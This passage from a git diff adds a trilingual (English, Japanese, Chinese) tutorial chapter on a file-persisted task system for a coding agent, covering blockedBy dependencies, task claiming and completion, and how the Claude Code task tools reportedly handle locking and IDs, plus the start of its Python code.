create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random_hex(4)}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task +``` + +Automatically calls `save_task` on creation to write `.tasks/{id}.json`. `blockedBy` declares dependencies — "write API" has `blockedBy: ["task_schema"]`. 
+ +### can_start: Dependency Check + +A task can only start after all its `blockedBy` dependencies are **completed**: + +```python +def can_start(task_id: str) -> bool: + task = load_task(task_id) + for dep_id in task.blockedBy: + dep = load_task(dep_id) + if dep.status != "completed": + return False + return True +``` + +`can_start` is a prerequisite check for `claim_task` — if any `blockedBy` dependency is not completed, the task cannot be claimed. + +### claim_task: Claim a Task + +When the agent starts working on a task, it calls `claim_task`: sets `owner`, changes status from `pending` → `in_progress`. The `owner` field records who is working on the task — preventing duplicate claims in multi-agent scenarios: + +```python +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy + if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + return f"Claimed {task_id} ({task.subject})" +``` + +If the task is already claimed by someone else (`status != "pending"`), or dependencies aren't met (`can_start` returns False), the claim is rejected. + +### complete_task: Complete and Unblock + +When a task is done, set it to `completed`. 
Simultaneously scan all other tasks to find downstream tasks that were **just unblocked**: + +```python +def complete_task(task_id: str) -> str: + task = load_task(task_id) + task.status = "completed" + save_task(task) + # Find newly unblocked downstream tasks + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy + and can_start(t.id)] + msg = f"Completed {task_id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg +``` + +After completing "schema", `can_start` returns True for "endpoints" and "docs" — they can begin. + +### State Machine: Two Edges + +``` +pending ──claim──→ in_progress ──complete──→ completed +``` + +- **claim**: `pending` → `in_progress`. Sets owner, begins work. +- **complete**: `in_progress` → `completed`. Unblocks downstream. + +CC has no `in_progress → pending` release path. If an agent crashes or abandons, CC uses `unassignTeammateTasks()` to clear the owner, but the status stays at `in_progress` — tasks don't roll back to pending. The tutorial follows the same design. + +### Putting It Together + +```python +# Create tasks with dependencies +schema = create_task("setup database schema") +endpoints = create_task("create API endpoints", blockedBy=[schema.id]) +tests = create_task("write tests", blockedBy=[endpoints.id]) +docs = create_task("write docs", blockedBy=[schema.id]) + +# Agent claims the first available task +claim_task(schema.id) # ✓ Claimed (no dependencies) +complete_task(schema.id) # ✓ Completed → unblocks endpoints, docs + +claim_task(endpoints.id) # ✓ Claimed (schema completed) +complete_task(endpoints.id) # ✓ Completed → unblocks tests + +claim_task(docs.id) # ✓ Claimed (schema completed) +complete_task(docs.id) # ✓ Completed + +claim_task(tests.id) # ✓ Claimed (endpoints completed) +complete_task(tests.id) # ✓ Completed +``` + +Each `create_task` writes a JSON file, each `claim_task` / `complete_task` updates the file. 
Across sessions, the `.tasks/` directory persists — the agent reads the files to recover progress. + +--- + +## Changes from s11 + +| Component | Before (s11) | After (s12) | +|-----------|-------------|-------------| +| Task management | None | Task dataclass + 4 tools | +| New types | — | Task (id, subject, description, status, owner, blockedBy) | +| Storage | No persistence | `.tasks/{id}.json` cross-session | +| Dependencies | None | `blockedBy` graph + `can_start` check | +| Tools | bash, read_file, write_file (3) | + create_task, list_tasks, claim_task, complete_task (7) | +| Lifecycle | — | pending → in_progress → completed (no release rollback) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s12_task_system/code.py +``` + +Try these prompts: + +1. `Create tasks: setup database schema, create API endpoints (depends on schema), write tests (depends on endpoints), write docs (depends on schema)` +2. `List all tasks and their statuses` +3. `Claim the first unblocked task and complete it` +4. `List tasks again — which ones are now unblocked?` + +What to observe: Are JSON files generated in the `.tasks/` directory? After completing a task, are the blocked tasks unblocked? + +--- + +## What's Next + +The task graph is in place. But some tasks take a long time — like running full test suites or deploying to a server. The agent can't just wait — it's calling the LLM, and time is money. + +s13 Background Tasks → Slow operations go to the background. The agent keeps thinking, and gets notified when the background work is done. + +
+Deep Dive into CC Source + +> The following is a complete analysis based on CC source code `utils/tasks.ts` (862 lines), `TaskCreateTool.ts`, `TaskUpdateTool.ts` (406 lines), `useTaskListWatcher.ts` (222 lines). + +### 1. TaskRecord's Full Fields + +The tutorial only covers id, subject, status, owner, blockedBy. CC actually has 9 fields (`utils/tasks.ts:75-91`): + +| Field | Type | Purpose | +|------|------|------| +| `id` | string | Incrementing integer ID | +| `subject` | string | Short title | +| `description` | string | Free-form description | +| `activeForm` | string? | Present tense form, shown in spinner when in_progress | +| `owner` | string? | Assigned agent ID | +| `status` | pending/in_progress/completed | Lifecycle | +| `blocks` | string[] | Task IDs blocked by this task (downstream) | +| `blockedBy` | string[] | Task IDs blocking this task (upstream) | +| `metadata` | Record? | Arbitrary extension key-value pairs | + +Storage location: `~/.claude/tasks/{taskListId}/{id}.json`. One file per task. + +### 2. Not a TodoWrite Upgrade — Two Independent Systems + +In CC, Task System and TodoWrite **coexist**, toggled by `isTodoV2Enabled()` (`utils/tasks.ts:133`) — non-interactive sessions (SDK) default to Task, interactive sessions use TodoWrite. Task has what TodoWrite lacks: file-lock concurrency protection, dependency enforcement, ownership, fs.watch reactive monitoring, lifecycle hooks. + +### 3. Concurrent Claim Locking + +`claimTask()` (`utils/tasks.ts:541-612`) uses dual locking to prevent races: + +**Task file lock**: `proper-lockfile` locks `{taskId}.json` (up to 30 retries, exponential backoff 5-100ms). Inside the lock: +1. Re-read task (prevent TOCTOU) +2. Check already claimed by another → `already_claimed` +3. Check already completed → `already_resolved` +4. Check upstream not completed → `blocked` +5. Set owner + +**List-level lock** (agent busy check): `.lock` file, atomic scan of all tasks to check if the agent already has other open tasks. 
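
The tutorial's single-agent code skips locking entirely. A crude Python stand-in for the proper-lockfile pattern described above — an `O_CREAT | O_EXCL` lockfile plus bounded exponential backoff; the helper name and delay values are assumptions of this sketch, not CC's implementation:

```python
import errno, os, time
from pathlib import Path

def with_file_lock(path: Path, fn, retries: int = 30, base_delay: float = 0.005):
    """Run fn() while holding an exclusive lockfile next to `path`.

    O_CREAT | O_EXCL makes lockfile creation atomic: exactly one process
    succeeds, everyone else backs off and retries (~5ms up to a 100ms cap).
    """
    lock = Path(str(path) + ".lock")
    for attempt in range(retries):
        try:
            fd = os.open(lock, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
        except OSError as e:
            if e.errno != errno.EEXIST:
                raise
            time.sleep(min(base_delay * (2 ** attempt), 0.1))
            continue
        try:
            return fn()      # re-read + mutate the task file inside the lock
        finally:
            os.close(fd)
            os.unlink(lock)
    raise TimeoutError(f"could not acquire lock for {path}")
```

Inside `fn`, a claim would re-read the JSON before mutating it — that re-read is the TOCTOU defense the lock exists to enable.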
+ 

### 4. High-Water Mark to Prevent ID Reuse

The `.highwatermark` file records the highest task ID ever assigned. Even if a task is deleted, its ID won't be reused.

### 5. Four Task Tools

CC's task system is split across four dedicated tools rather than one generic `Task` tool: `TaskCreate`, `TaskGet`, `TaskUpdate`, `TaskList`. All set `isConcurrencySafe: true` and `shouldDefer: true` (tool schemas aren't in the initial prompt; only visible after ToolSearch).

+ 
+ + diff --git a/s12_task_system/README.ja.md b/s12_task_system/README.ja.md new file mode 100644 index 000000000..ab9029488 --- /dev/null +++ b/s12_task_system/README.ja.md @@ -0,0 +1,262 @@ +# s12: Task System — 大きな目標を小さなタスクに分割 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s10 → s11 → `s12` → [s13](../s13_background_tasks/) → s14 → ... → s19 + +> *"大きな目標を小さなタスクに分け、順序付け、永続化"* — ファイル永続化タスクグラフ、マルチ Agent 協調の基盤。 +> +> **Harness 層**: タスク — 永続化された目標、復旧可能な進捗。 + +--- + +## 課題 + +Agent がプロジェクトを受けた:データベース構築、API 実装、テスト追加。s05 の TodoWrite でリストを作り、作業開始 — 先に API を書き始め、途中でデータベーステーブルがないことに気づいて戻る。テスト追加時に API インターフェースのシグネチャがまた変わっている... + +屋根を先に建てて基礎を後から打つことはできない。タスクには順序がある — この「どちらが先か」の関係には名前がついている:**有向非巡回グラフ(DAG)**。 + +s05 の TodoWrite はリスト。依存関係も永続化もなく、会話が終わればリストも消える。必要なのは**タスクシステム**:各タスクは JSON ファイル、タスク間に `blockedBy` 依存関係、ディスク上でセッションをまたいで永続化。 + +--- + +## ソリューション + +![Task System Overview](images/task-system-overview.ja.svg) + +s11 のループとプロンプト組み立てはすべて保持。唯一の変更:4 つの新規タスクツール + `.tasks/` ディレクトリによる永続化 + `blockedBy` 依存チェック。タスクシステムとエラーリカバリは独立したレイヤー — CC ソースコードでは `utils/tasks.ts` は CRUD のみ、`query.ts` の with_retry/RecoveryState がエラーリカバリを担当し、互いに非結合。 + +TodoWrite vs Task System: + +| | TodoWrite (s05) | Task System (s12) | +|---|---|---| +| ストレージ | メモリ内リスト | `.tasks/` JSON ファイル | +| 依存関係 | なし | `blockedBy` 有向非巡回グラフ | +| 永続性 | 会話終了で消失 | セッション横断 | +| マルチ Agent | なし | `owner` フィールド | +| ステータス | checked / unchecked | pending → in_progress → completed | + +--- + +## 仕組み + +![Task DAG](images/task-dag.ja.svg) + +### Task: データ構造 + +各タスクは JSON ファイル、`.tasks/` ディレクトリに保存: + +```python +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None # Agent 名(マルチ Agent シナリオ) + blockedBy: list[str] # 依存タスク ID のリスト +``` + +ID は `timestamp + random hex` で生成 — シンプルだが十分。CC は順次 ID + highwatermark ファイルで ID 再利用を防止する、より厳密な設計。 + +### create_task: タスク作成 + +```python +def create_task(subject: str, description: 
str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random_hex(4)}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task +``` + +作成時に自動的に `save_task` で `.tasks/{id}.json` に書き込み。`blockedBy` で依存を宣言 — "API を書く" の `blockedBy` は `["task_schema"]`。 + +### can_start: 依存チェック + +タスクは `blockedBy` が**すべて completed** になってからでないと開始できない: + +```python +def can_start(task_id: str) -> bool: + task = load_task(task_id) + for dep_id in task.blockedBy: + dep = load_task(dep_id) + if dep.status != "completed": + return False + return True +``` + +`can_start` は `claim_task` の事前チェック — `blockedBy` に一つでも completed でないものがあれば、認識不可。 + +### claim_task: タスク認識 + +Agent がタスクに取り掛かる時、`claim_task` を呼び出し:`owner` を設定、ステータスを `pending` → `in_progress` に変更。`owner` フィールドは誰が作業中かを記録 — マルチ Agent シナリオで重複認識を防止: + +```python +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy + if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + return f"Claimed {task_id} ({task.subject})" +``` + +タスクが既に他者に認識されている(`status != "pending"`)、または依存が未完了(`can_start` が False)の場合、認識を拒否。 + +### complete_task: 完了とアンロック + +タスク完了後、`completed` に設定。同時に他の全タスクを走査し、**直前にアンロックされた**下流タスクを特定: + +```python +def complete_task(task_id: str) -> str: + task = load_task(task_id) + task.status = "completed" + save_task(task) + # アンロックされた下流タスクを検索 + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy + and can_start(t.id)] + msg = f"Completed {task_id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg +``` + +"schema" 完了後、"endpoints" と "docs" の `can_start` が True 
を返し、開始可能に。 + +### 状態マシン: 2 つの遷移 + +``` +pending ──claim──→ in_progress ──complete──→ completed +``` + +- **claim**: `pending` → `in_progress`。owner を設定、作業開始。 +- **complete**: `in_progress` → `completed`。下流をアンロック。 + +CC には `in_progress → pending` の release パスがない。Agent がクラッシュや放棄した場合、CC は `unassignTeammateTasks()` で owner をクリアするが、status は `in_progress` を維持 — タスクは pending に戻らない。チュートリアルも同じ設計に従う。 + +### 組み合わせて実行 + +```python +# 依存関係のあるタスクを作成 +schema = create_task("setup database schema") +endpoints = create_task("create API endpoints", blockedBy=[schema.id]) +tests = create_task("write tests", blockedBy=[endpoints.id]) +docs = create_task("write docs", blockedBy=[schema.id]) + +# Agent が最初に実行可能なタスクを認識 +claim_task(schema.id) # ✓ Claimed(依存なし) +complete_task(schema.id) # ✓ Completed → endpoints, docs をアンロック + +claim_task(endpoints.id) # ✓ Claimed(schema 完了済み) +complete_task(endpoints.id) # ✓ Completed → tests をアンロック + +claim_task(docs.id) # ✓ Claimed(schema 完了済み) +complete_task(docs.id) # ✓ Completed + +claim_task(tests.id) # ✓ Claimed(endpoints 完了済み) +complete_task(tests.id) # ✓ Completed +``` + +各 `create_task` が JSON ファイルを書き込み、各 `claim_task` / `complete_task` がファイルを更新。セッションをまたいでも `.tasks/` ディレクトリが残り、Agent はファイルを読んで進捗を復旧。 + +--- + +## s11 からの変更 + +| コンポーネント | 変更前 (s11) | 変更後 (s12) | +|--------------|------------|------------| +| タスク管理 | なし | Task dataclass + 4 ツール | +| 新規型 | — | Task(id, subject, description, status, owner, blockedBy) | +| ストレージ | 永続化なし | `.tasks/{id}.json` セッション横断 | +| 依存関係 | なし | `blockedBy` グラフ + `can_start` チェック | +| ツール | bash, read_file, write_file (3) | + create_task, list_tasks, claim_task, complete_task (7) | +| ライフサイクル | — | pending → in_progress → completed(release ロールバックなし) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s12_task_system/code.py +``` + +以下のプロンプトを試してください: + +1. `Create tasks: setup database schema, create API endpoints (depends on schema), write tests (depends on endpoints), write docs (depends on schema)` +2. 
`List all tasks and their statuses` +3. `Claim the first unblocked task and complete it` +4. `List tasks again — which ones are now unblocked?` + +観察ポイント:`.tasks/` ディレクトリに JSON ファイルが生成されているか?タスク完了後、ブロックされていたタスクがアンロックされているか? + +--- + +## 次の章 + +タスクグラフができた。しかし、一部のタスクは長時間かかる — 全テスト実行やサーバーデプロイなど。Agent は待っていられない — LLM を呼び出している、時間はお金。 + +s13 Background Tasks → 遅い操作はバックグラウンドへ。Agent は思考を続け、バックグラウンドの完了を通知で受け取る。 + +
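
上の依存チェックとアンロックの連鎖は、ファイル I/O を省いたメモリ上の dict だけでも確認できる。以下は本章のコードとは別物の、仮の最小スケッチ(関数名・データ構造はこのスケッチ独自の仮定):

```python
# メモリ上のタスク表で claim/complete の連鎖だけを再現する
tasks = {
    "schema":    {"status": "pending", "blockedBy": []},
    "endpoints": {"status": "pending", "blockedBy": ["schema"]},
    "tests":     {"status": "pending", "blockedBy": ["endpoints"]},
    "docs":      {"status": "pending", "blockedBy": ["schema"]},
}

def can_start(tid: str) -> bool:
    # blockedBy がすべて completed なら開始可能
    return all(tasks[d]["status"] == "completed" for d in tasks[tid]["blockedBy"])

def runnable() -> list[str]:
    # いま取り掛かれる pending タスクの一覧
    return [t for t, v in tasks.items()
            if v["status"] == "pending" and can_start(t)]
```

schema を completed にすると endpoints と docs が同時に runnable に現れる — 本文の「アンロック」は、この再評価にすぎない。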
+CC ソースコード深掘り + +> 以下は CC ソースコード `utils/tasks.ts`(862 行)、`TaskCreateTool.ts`、`TaskUpdateTool.ts`(406 行)、`useTaskListWatcher.ts`(222 行)の完全分析に基づきます。 + +### 一、TaskRecord の完全フィールド + +チュートリアルでは id、subject、status、owner、blockedBy のみ解説。CC は実際に 9 フィールドを持つ(`utils/tasks.ts:75-91`): + +| フィールド | 型 | 用途 | +|------|------|------| +| `id` | string | 昇順整数 ID | +| `subject` | string | 短いタイトル | +| `description` | string | 自由形式の説明 | +| `activeForm` | string? | 現在進行形、in_progress 時にスピナーに表示 | +| `owner` | string? | 割り当てられた agent ID | +| `status` | pending/in_progress/completed | ライフサイクル | +| `blocks` | string[] | このタスクがブロックするタスク ID(下流) | +| `blockedBy` | string[] | このタスクをブロックするタスク ID(上流) | +| `metadata` | Record? | 任意の拡張キーバリューペア | + +保存場所:`~/.claude/tasks/{taskListId}/{id}.json`。タスクごとに 1 ファイル。 + +### 二、TodoWrite のアップグレードではなく、2 つの独立システム + +CC では Task System と TodoWrite **は共存**し、`isTodoV2Enabled()` で切り替え(`utils/tasks.ts:133`)— 非対話セッション(SDK)はデフォルトで Task、対話セッションは TodoWrite。Task は TodoWrite にない機能を持つ:ファイルロック並行保護、依存関係強制、ownership、fs.watch リアクティブ監視、ライフサイクルフック。 + +### 三、並行認識のロック機構 + +`claimTask()`(`utils/tasks.ts:541-612`)は二重ロックで競合を防止: + +**タスクファイルロック**:`proper-lockfile` で `{taskId}.json` をロック(最大 30 リトライ、指数バックオフ 5-100ms)。ロック内: +1. タスクを再読込(TOCTOU 防止) +2. 既に他者が認識済み → `already_claimed` +3. 既に完了済み → `already_resolved` +4. 上流が未完了 → `blocked` +5. owner を設定 + +**リストレベルロック**(agent busy チェック時):`.lock` ファイル、全タスクを原子的に走査し該当 agent が他の open task を持つか確認。 + +### 四、高水位標による ID 再利用防止 + +`.highwatermark` ファイルが過去に割り当てられた最大タスク ID を記録。タスクが削除されても ID は再利用されない。 + +### 五、4 つの Task ツール + +CC のタスクシステムは 4 つのツールを持つ(チュートリアルの汎用 Task ツールとは異なる):`TaskCreate`、`TaskGet`、`TaskUpdate`、`TaskList`。すべて `isConcurrencySafe: true` と `shouldDefer: true` が設定(ツールスキーマは初期プロンプトに含まれず、ToolSearch 後にのみ可視)。 + +
+ + diff --git a/s12_task_system/README.md b/s12_task_system/README.md new file mode 100644 index 000000000..2f30e5d8a --- /dev/null +++ b/s12_task_system/README.md @@ -0,0 +1,262 @@ +# s12: Task System — 目标太大,拆成小任务 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s10 → s11 → `s12` → [s13](../s13_background_tasks/) → s14 → ... → s19 + +> *"大目标拆成小任务, 排好序, 持久化"* — 文件持久化的任务图, 多 agent 协作的基础。 +> +> **Harness 层**: 任务 — 持久化的目标, 可恢复的进度。 + +--- + +## 问题 + +Agent 接到一个项目:搭数据库、写 API、加测试。它用 s05 的 TodoWrite 列了一张清单,然后开始干活——先写 API,写到一半发现没数据库表,回头改;加测试时发现 API 接口签名又改了... + +盖房子不能先盖屋顶再打地基。任务之间有先后——这种"谁先谁后"的关系,有个名字叫**有向无环图(DAG)**。 + +s05 的 TodoWrite 是一个列表。没有依赖关系、没有持久化、对话结束列表就没了。你需要的是**任务系统**:每个任务是一个 JSON 文件,任务之间有 `blockedBy` 依赖,跨会话持久化在磁盘上。 + +--- + +## 解决方案 + +![Task System Overview](images/task-system-overview.svg) + +s11 的循环、prompt 组装全部保留。唯一的变动:新增 4 个任务工具 + `.tasks/` 目录持久化 + `blockedBy` 依赖检查。任务系统与错误恢复是独立层——CC 源码中 `utils/tasks.ts` 只管 CRUD,`query.ts` 的 with_retry/RecoveryState 管错误恢复,互不耦合。 + +TodoWrite vs Task System: + +| | TodoWrite (s05) | Task System (s12) | +|---|---|---| +| 存储 | 内存列表 | `.tasks/` JSON 文件 | +| 依赖 | 无 | `blockedBy` 有向无环图 | +| 持久性 | 对话结束即丢 | 跨会话 | +| 多 Agent | 无 | `owner` 字段 | +| 状态 | checked / unchecked | pending → in_progress → completed | + +--- + +## 工作原理 + +![Task DAG](images/task-dag.svg) + +### Task: 数据结构 + +每个任务是一个 JSON 文件,存于 `.tasks/` 目录: + +```python +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None # Agent 名(多 Agent 场景) + blockedBy: list[str] # 依赖的任务 ID 列表 +``` + +ID 用 `timestamp + random hex` 生成——简单但够用。CC 用顺序 ID + highwatermark 文件防止 ID 重用,是更严谨的设计。 + +### create_task: 创建任务 + +```python +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random_hex(4)}", + subject=subject, description=description, + status="pending", owner=None, + 
blockedBy=blockedBy or [], + ) + save_task(task) + return task +``` + +创建时自动 `save_task` 到 `.tasks/{id}.json`。`blockedBy` 声明依赖——"写 API"的 `blockedBy` 是 `["task_schema"]`。 + +### can_start: 依赖检查 + +一个任务只能在它的 `blockedBy` **全部 completed** 之后才能开始: + +```python +def can_start(task_id: str) -> bool: + task = load_task(task_id) + for dep_id in task.blockedBy: + dep = load_task(dep_id) + if dep.status != "completed": + return False + return True +``` + +`can_start` 是 `claim_task` 的前置检查——`blockedBy` 里有任何一个不是 completed,就不能认领。 + +### claim_task: 认领任务 + +Agent 开始做一个任务时,调用 `claim_task`:设置 `owner`,状态从 `pending` → `in_progress`。`owner` 字段记录谁在做这个任务——多 Agent 场景下防止重复认领: + +```python +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy + if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + return f"Claimed {task_id} ({task.subject})" +``` + +如果任务已被别人认领(`status != "pending"`),或者依赖没完成(`can_start` 返回 False),拒绝认领。 + +### complete_task: 完成与解锁 + +任务做完后,设为 `completed`。同时扫描所有其他任务,找出**刚刚被解锁**的下游任务: + +```python +def complete_task(task_id: str) -> str: + task = load_task(task_id) + task.status = "completed" + save_task(task) + # 找出被解锁的下游任务 + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy + and can_start(t.id)] + msg = f"Completed {task_id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg +``` + +完成 "schema" 后,"endpoints" 和 "docs" 的 `can_start` 返回 True,它们可以开始。 + +### 状态机: 两条边 + +``` +pending ──claim──→ in_progress ──complete──→ completed +``` + +- **claim**: `pending` → `in_progress`。设置 owner,开始工作。 +- **complete**: `in_progress` → `completed`。解锁下游。 + +CC 没有 `in_progress → pending` 的 release 路径。如果 Agent 崩溃或放弃,CC 用 `unassignTeammateTasks()` 
清除 owner,但 status 保持在 `in_progress`——任务不会回退到 pending。教学版遵循同样的设计。 + +### 合起来跑 + +```python +# 创建有依赖的任务 +schema = create_task("setup database schema") +endpoints = create_task("create API endpoints", blockedBy=[schema.id]) +tests = create_task("write tests", blockedBy=[endpoints.id]) +docs = create_task("write docs", blockedBy=[schema.id]) + +# Agent 认领第一个可做的任务 +claim_task(schema.id) # ✓ Claimed (无依赖) +complete_task(schema.id) # ✓ Completed → 解锁 endpoints, docs + +claim_task(endpoints.id) # ✓ Claimed (schema 已完成) +complete_task(endpoints.id) # ✓ Completed → 解锁 tests + +claim_task(docs.id) # ✓ Claimed (schema 已完成) +complete_task(docs.id) # ✓ Completed + +claim_task(tests.id) # ✓ Claimed (endpoints 已完成) +complete_task(tests.id) # ✓ Completed +``` + +每个 `create_task` 写一个 JSON 文件,每个 `claim_task` / `complete_task` 更新文件。跨会话时,`.tasks/` 目录还在,Agent 读文件就能恢复进度。 + +--- + +## 相对 s11 的变更 + +| 组件 | 之前 (s11) | 之后 (s12) | +|------|-----------|-----------| +| 任务管理 | 无 | Task dataclass + 4 个工具 | +| 新类型 | — | Task(id, subject, description, status, owner, blockedBy) | +| 存储 | 无持久化 | `.tasks/{id}.json` 跨会话 | +| 依赖 | 无 | `blockedBy` 图 + `can_start` 检查 | +| 工具 | bash, read_file, write_file (3) | + create_task, list_tasks, claim_task, complete_task (7) | +| 生命周期 | — | pending → in_progress → completed(无 release 回退) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s12_task_system/code.py +``` + +试试这些 prompt: + +1. `Create tasks: setup database schema, create API endpoints (depends on schema), write tests (depends on endpoints), write docs (depends on schema)` +2. `List all tasks and their statuses` +3. `Claim the first unblocked task and complete it` +4. `List tasks again — which ones are now unblocked?` + +观察重点:`.tasks/` 目录下是否生成了 JSON 文件?完成任务后,被阻塞的任务是否解锁? + +--- + +## 接下来 + +任务图有了。但有些任务要跑很久——比如跑全量测试、部署到服务器。Agent 不能干等着——它在调 LLM,时间就是钱。 + +s13 Background Tasks → 慢操作放后台。Agent 继续思考,后台跑完了通知它。 + +
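“跨会话恢复”这一点可以用几行代码验证(极简示意,复用上文的 `.tasks/` JSON 布局;`restore_progress` 是本文为演示虚构的辅助函数,不在教学版代码里):

```python
import json
from pathlib import Path

TASKS_DIR = Path(".tasks")

def restore_progress() -> dict[str, list[str]]:
    """按状态分组列出 .tasks/ 中的所有任务,用于新会话启动时恢复进度。"""
    groups: dict[str, list[str]] = {"pending": [], "in_progress": [], "completed": []}
    for p in sorted(TASKS_DIR.glob("task_*.json")):
        t = json.loads(p.read_text())
        groups.setdefault(t["status"], []).append(t["subject"])
    return groups
```

新会话里先调一次 `restore_progress`,Agent 就知道哪些任务已完成、哪些还挂着 —— 状态全在文件里,进程内存丢了也无所谓。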
+深入 CC 源码 + +> 以下基于 CC 源码 `utils/tasks.ts`(862 行)、`TaskCreateTool.ts`、`TaskUpdateTool.ts`(406 行)、`useTaskListWatcher.ts`(222 行)的完整分析。 + +### 一、TaskRecord 的完整字段 + +教学版只讲了 id、subject、status、owner、blockedBy。CC 实际有 9 个字段(`utils/tasks.ts:75-91`): + +| 字段 | 类型 | 用途 | +|------|------|------| +| `id` | string | 递增整数 ID | +| `subject` | string | 简短标题 | +| `description` | string | 自由格式描述 | +| `activeForm` | string? | 进行时态,in_progress 时在 spinner 显示 | +| `owner` | string? | 分配的 agent ID | +| `status` | pending/in_progress/completed | 生命周期 | +| `blocks` | string[] | 此任务阻塞的任务 ID(下游) | +| `blockedBy` | string[] | 阻塞此任务的任务 ID(上游) | +| `metadata` | Record? | 任意扩展键值对 | + +存储位置:`~/.claude/tasks/{taskListId}/{id}.json`。每个任务一个文件。 + +### 二、不是 TodoWrite 的升级,是两个独立系统 + +CC 中 Task System 和 TodoWrite **同时存在**,通过 `isTodoV2Enabled()` 切换(`utils/tasks.ts:133`)——非交互式会话(SDK)默认用 Task,交互式用 TodoWrite。Task 有 TodoWrite 没有的:文件锁并发保护、依赖强制执行、ownership、fs.watch 响应式监听、生命周期 hooks。 + +### 三、并发认领的锁机制 + +`claimTask()`(`utils/tasks.ts:541-612`)用双重锁防竞争: + +**任务文件锁**:`proper-lockfile` 锁住 `{taskId}.json`(最多重试 30 次,指数退避 5-100ms)。锁内: +1. 重新读取任务(防 TOCTOU) +2. 检查已被他人认领 → `already_claimed` +3. 检查已完成 → `already_resolved` +4. 检查上游未完成 → `blocked` +5. 设置 owner + +**列表级锁**(agent busy 检查时):`.lock` 文件,原子性扫描所有任务并检查该 agent 是否已有其他 open task。 + +### 四、高水位标防 ID 重用 + +`.highwatermark` 文件记录曾分配过的最高任务 ID。即使任务被删除,ID 也不会被重用。 + +### 五、四个 Task 工具 + +CC 的任务系统有四个工具(不是教学版的一个通用 Task 工具):`TaskCreate`、`TaskGet`、`TaskUpdate`、`TaskList`。全部设置 `isConcurrencySafe: true` 和 `shouldDefer: true`(工具 schema 不在初始 prompt 中,需 ToolSearch 后才可见)。 + +
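第三节“锁内重读再认领”的模式可以用 POSIX 文件锁写一个极简示意(仅为教学演示:CC 实际用的是 `proper-lockfile` 加指数退避重试,这里换成标准库 `fcntl`;`claim_task_locked` 是本文虚构的函数名,返回值沿用源码里的 `already_claimed` / `already_resolved`):

```python
import fcntl
import json
from pathlib import Path

def claim_task_locked(task_path: Path, owner: str) -> str:
    """在独占文件锁内重读任务再认领,防止两个 Agent 同时 claim(TOCTOU)。"""
    with open(task_path, "r+") as f:
        fcntl.flock(f, fcntl.LOCK_EX)        # 独占锁;CC 用 proper-lockfile + 5-100ms 指数退避
        task = json.loads(f.read())           # 锁内重新读取,而不是用锁外拿到的旧快照
        if task["status"] != "pending":
            return "already_claimed" if task.get("owner") else "already_resolved"
        task["status"], task["owner"] = "in_progress", owner
        f.seek(0)
        f.truncate()
        f.write(json.dumps(task, indent=2))
        return "claimed"                      # with 退出时关闭文件并释放锁
```

关键在于第 2 步:锁拿到之后必须**重读**文件再判断状态。如果用锁外读到的快照做判断,两个 Agent 仍可能各自看到 `pending`、各自写入 `owner` —— 锁就白加了。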
+ + diff --git a/s12_task_system/code.py b/s12_task_system/code.py new file mode 100644 index 000000000..e4ca31b89 --- /dev/null +++ b/s12_task_system/code.py @@ -0,0 +1,348 @@ +#!/usr/bin/env python3 +""" +s12: Task System — file-persisted task graph with blockedBy dependencies. + +Run: python s12_task_system/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s11: + - Task dataclass (id, subject, description, status, owner, blockedBy) + - TASKS_DIR = .tasks/ for persistent JSON storage + - create_task / save_task / load_task / list_tasks + - can_start: checks blockedBy all completed + - claim_task: set owner + pending -> in_progress + - complete_task: set completed + report unblocked downstream + - 4 new tools: create_task, list_tasks, claim_task, complete_task +""" + +import os, subprocess, json, time, random +from pathlib import Path +from dataclasses import dataclass, asdict + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None # 